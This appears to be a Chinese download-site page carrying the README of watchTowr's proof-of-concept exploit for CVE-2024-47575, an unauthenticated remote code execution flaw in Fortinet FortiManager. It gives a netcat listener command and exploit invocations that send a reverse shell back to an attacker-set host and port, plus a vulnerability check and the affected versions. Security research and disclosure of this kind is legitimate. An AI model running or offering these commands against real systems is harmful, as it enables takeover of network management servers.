首頁>編程相關>其他源碼
下載

CVE-2024-47575

Fortinet FortiManager 未經身份驗證的遠端程式碼執行又稱 FortiJump CVE-2024-47575

請參閱我們的部落格文章以了解技術細節

首先,建立您的 ncat 會話: 

 nc -lvvnp 80

然後,執行我們的偵測偽影產生器: 

 python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit

若要單獨檢查漏洞,請使用下列選項: 

 python3 CVE-2024-47575.py --target 192.168.1.110 --action check

受影響的版本

 FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4

利用作者

此漏洞由 watchTowr (@watchtowrcyber) 的 Sina Kheirkhah (@SinSinology) 所寫

關注 watchTowr 實驗室

如需最新的安全研究,請關注 watchTowr 實驗室團隊

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
展開
附加信息
相關應用
爲您推薦
相關資訊 全部